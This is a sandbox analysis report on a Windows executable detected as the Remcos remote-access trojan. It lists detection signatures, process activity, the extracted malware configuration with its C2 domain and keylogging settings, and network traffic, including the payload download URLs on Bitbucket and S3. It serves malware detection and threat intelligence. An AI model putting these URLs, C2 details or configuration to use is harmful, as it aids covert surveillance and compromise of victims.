Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4JwhvqLe8n.exe

Overview

General Information

Sample name:4JwhvqLe8n.exe
renamed because original name is a hash value
Original sample name:66e6c38dc2c5e1dc03209e8f876d546c94a1b806c6e02c3b33f5e523eb3fdff9.exe
Analysis ID:1573906
MD5:b58e300ca8077adc4094e9044bcdbbc8
SHA1:abc3b46626e17e22b744b9fe44833919255121ce
SHA256:66e6c38dc2c5e1dc03209e8f876d546c94a1b806c6e02c3b33f5e523eb3fdff9
Tags:181-131-217-244exeuser-JAMESWT_MHT
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Creates multiple autostart registry keys
Drops large PE files
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 4JwhvqLe8n.exe (PID: 5040 cmdline: "C:\Users\user\Desktop\4JwhvqLe8n.exe" MD5: B58E300CA8077ADC4094E9044BCDBBC8)
    • csc.exe (PID: 1372 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
  • ccrdlld.exe (PID: 4288 cmdline: C:\Users\user\AppData\Local\Temp\ccrdlld.exe MD5: 27650AFE28BA588C759ADE95BF403833)
    • ccrdlld.exe (PID: 7120 cmdline: "C:\Users\user\AppData\Local\Temp\ccrdlld.exe" MD5: 27650AFE28BA588C759ADE95BF403833)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["newstaticfreepoint24.ddns-ip.net:1842:0"], "Assigned name": "FUTURAMA", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jdjgkdgjgkjhh-8DHJNN", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "fdgfghgfhg", "Keylog file max size": ""}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.2580957765.0000000000401000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    00000003.00000002.4046933344.0000000007EC2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 21 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.csc.exe.7f46ca8.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              3.2.csc.exe.94d0000.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                3.2.csc.exe.9410000.5.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  5.2.ccrdlld.exe.11bb0000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    5.2.ccrdlld.exe.11bb0000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                      Click to see the 23 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4JwhvqLe8n.exe, ProcessId: 5040, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OrionLegacyCLI

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T18:02:36.897207+010020327761Malware Command and Control Activity Detected192.168.2.549843181.131.217.2441842TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T18:02:38.178693+010020327771Malware Command and Control Activity Detected181.131.217.2441842192.168.2.549843TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-12T18:02:40.788175+010028033043Unknown Traffic192.168.2.549850178.237.33.5080TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["newstaticfreepoint24.ddns-ip.net:1842:0"], "Assigned name": "FUTURAMA", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jdjgkdgjgkjhh-8DHJNN", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "fdgfghgfhg", "Keylog file max size": ""}
                      Multi AV Scanner detection for submitted file
                      Source: 4JwhvqLe8n.exeReversingLabs: Detection: 42%
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ccrdlld.exe PID: 4288, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ccrdlld.exe PID: 7120, type: MEMORYSTR
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Source: ccrdlld.exe, 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_898c9e81-9

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ccrdlld.exe PID: 4288, type: MEMORYSTR
                      Source: 4JwhvqLe8n.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.5.24.44:443 -> 192.168.2.5:49760 version: TLS 1.2
                      Source: 4JwhvqLe8n.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\samcnary\Desktop\legacyPM\core\CoreService\runtime\OriginLegacyCLI.pdb source: 4JwhvqLe8n.exe, OrionLegacyCLI.exe.0.dr
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000002.4046933344.0000000007D21000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4046933344.0000000007D9D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4048264340.0000000009C40000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: Srlfeb.pdb source: csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4047366440.0000000009410000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.0000000007FBC000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000002.4046933344.0000000007D21000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4046933344.0000000007D9D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4048264340.0000000009C40000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Srlfeb.pdbx source: csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4047366440.0000000009410000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.0000000007FBC000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49843 -> 181.131.217.244:1842
                      Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 181.131.217.244:1842 -> 192.168.2.5:49843
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: newstaticfreepoint24.ddns-ip.net
                      Source: global trafficTCP traffic: 192.168.2.5:49743 -> 181.131.217.244:30203
                      Source: global trafficHTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGB46CDIP&Signature=OsUnoSTQrRgZD6FYZJqgppUhBLs%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIQC1qssmaZMu0Kq%2F5UE7VMx074oM1d%2BXj1uJ%2B9uNqpoePQIgFeE4zY04aoLCi5xHmh1Tg9HBeMUGDXUCT9cKr%2FT49vsqsAIIwv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDL4p3i3uRNNKPKBtsiqEAmWSN4qXnlEPekaIRewDbxqmzd738FbMSYF6yOejRX7UjKy58YjDJFsXH4LoiMqySTikefatHXwx8UawuXSw40xhPCSf6ZNVVhxIs6%2B98cEmwIvmpRC%2FOdW4sDY4BxSBIF%2F2NDDOh7bpfb7NAWS%2B9VcOTbH6Q5Odca1yZcK4sIsx90QntabTAavZ5qDYhdxdDEHOXtZ1I67Kh3cnKHUnUsfzGqjAWfoXFAT%2B6VxUzAueumFQfzwfbjwOus4ML23IBZ%2F8pc8JVhhIpJZjV04Xv2X%2BZ%2BDSSf4IIoyBBrjX%2Fp23vP%2B%2FAEHvBknm1v51J7irQC8H%2FqOcUfKjIseMSrem7rdR3R7tML2q7LoGOp0Be%2BbdUZ1VS1k%2BpYMTJXZ%2F0oOTjr23Th9wKEZGAxpdrR2zB1mn2dI1EsUc4DFBYgtG7bhYUMbmqOm68u4XRTBt5CkqTMOhF2vlWfjFIst%2FFcuh79oP5sOZM%2Bc28pWjSzS5Sb%2FRPafPW2EkEoPjN8t6s7G60X3gGdNv5GCfg%2Fy0pEaQIfUP%2B0COHPB2ZtejxGzevcprVlI4MAXc9bO%2BsQ%3D%3D&Expires=1734024261 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 181.131.217.244 181.131.217.244
                      Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
                      Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49850 -> 178.237.33.50:80
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /facturacioncol/fact/downloads/null.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGB46CDIP&Signature=OsUnoSTQrRgZD6FYZJqgppUhBLs%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIQC1qssmaZMu0Kq%2F5UE7VMx074oM1d%2BXj1uJ%2B9uNqpoePQIgFeE4zY04aoLCi5xHmh1Tg9HBeMUGDXUCT9cKr%2FT49vsqsAIIwv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDL4p3i3uRNNKPKBtsiqEAmWSN4qXnlEPekaIRewDbxqmzd738FbMSYF6yOejRX7UjKy58YjDJFsXH4LoiMqySTikefatHXwx8UawuXSw40xhPCSf6ZNVVhxIs6%2B98cEmwIvmpRC%2FOdW4sDY4BxSBIF%2F2NDDOh7bpfb7NAWS%2B9VcOTbH6Q5Odca1yZcK4sIsx90QntabTAavZ5qDYhdxdDEHOXtZ1I67Kh3cnKHUnUsfzGqjAWfoXFAT%2B6VxUzAueumFQfzwfbjwOus4ML23IBZ%2F8pc8JVhhIpJZjV04Xv2X%2BZ%2BDSSf4IIoyBBrjX%2Fp23vP%2B%2FAEHvBknm1v51J7irQC8H%2FqOcUfKjIseMSrem7rdR3R7tML2q7LoGOp0Be%2BbdUZ1VS1k%2BpYMTJXZ%2F0oOTjr23Th9wKEZGAxpdrR2zB1mn2dI1EsUc4DFBYgtG7bhYUMbmqOm68u4XRTBt5CkqTMOhF2vlWfjFIst%2FFcuh79oP5sOZM%2Bc28pWjSzS5Sb%2FRPafPW2EkEoPjN8t6s7G60X3gGdNv5GCfg%2Fy0pEaQIfUP%2B0COHPB2ZtejxGzevcprVlI4MAXc9bO%2BsQ%3D%3D&Expires=1734024261 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: global trafficDNS traffic detected: DNS query: navegacionseguracol24vip.org
                      Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                      Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                      Source: global trafficDNS traffic detected: DNS query: newstaticfreepoint24.ddns-ip.net
                      Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bbuseruploads.s3.amazonaws.com
                      Source: ccrdlld.exe, 00000006.00000003.2854551296.0000000009AA4000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009AAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                      Source: ccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                      Source: ccrdlld.exe, 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, ccrdlld.exe, 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: ccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpO
                      Source: ccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpWJ
                      Source: ccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpapJ
                      Source: ccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpdJ
                      Source: ccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpn.net/son.gp5BCA4A7416B
                      Source: ccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpnJ
                      Source: ccrdlld.exe, 00000006.00000003.2854551296.0000000009AA4000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009AAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/lrpc:
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-w.us-east-1.amazonaws.com
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006D21000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4046058134.0000000006FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: csc.exe, 00000003.00000003.2577032423.00000000080B7000.00000004.00000800.00020000.00000000.sdmp, ccrdlld.exe, 00000005.00000000.2580957765.000000000051C000.00000020.00000001.01000000.00000008.sdmp, ccrdlld.exe, 00000005.00000002.2860397581.00000000135BE000.00000004.00001000.00020000.00000000.sdmp, ccrdlld.exe.3.drString found in binary or memory: http://www.hdsentinel.com
                      Source: csc.exe, 00000003.00000003.2577032423.00000000080B7000.00000004.00000800.00020000.00000000.sdmp, ccrdlld.exe, 00000005.00000000.2580957765.000000000051C000.00000020.00000001.01000000.00000008.sdmp, ccrdlld.exe, 00000005.00000002.2860397581.00000000135BE000.00000004.00001000.00020000.00000000.sdmp, ccrdlld.exe.3.drString found in binary or memory: http://www.hdsentinel.com/sendreport.phpU
                      Source: csc.exe, 00000003.00000003.2577032423.00000000080B7000.00000004.00000800.00020000.00000000.sdmp, ccrdlld.exe, 00000005.00000000.2580957765.000000000051C000.00000020.00000001.01000000.00000008.sdmp, ccrdlld.exe, 00000005.00000002.2860397581.00000000135BE000.00000004.00001000.00020000.00000000.sdmp, ccrdlld.exe.3.drString found in binary or memory: http://www.hdsentinel.comU
                      Source: ccrdlld.exe.3.drString found in binary or memory: http://www.indyproject.org/
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006E4B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4046058134.0000000006DD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/facturacioncol/fact/downloads/null.exe
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                      Source: csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                      Source: csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
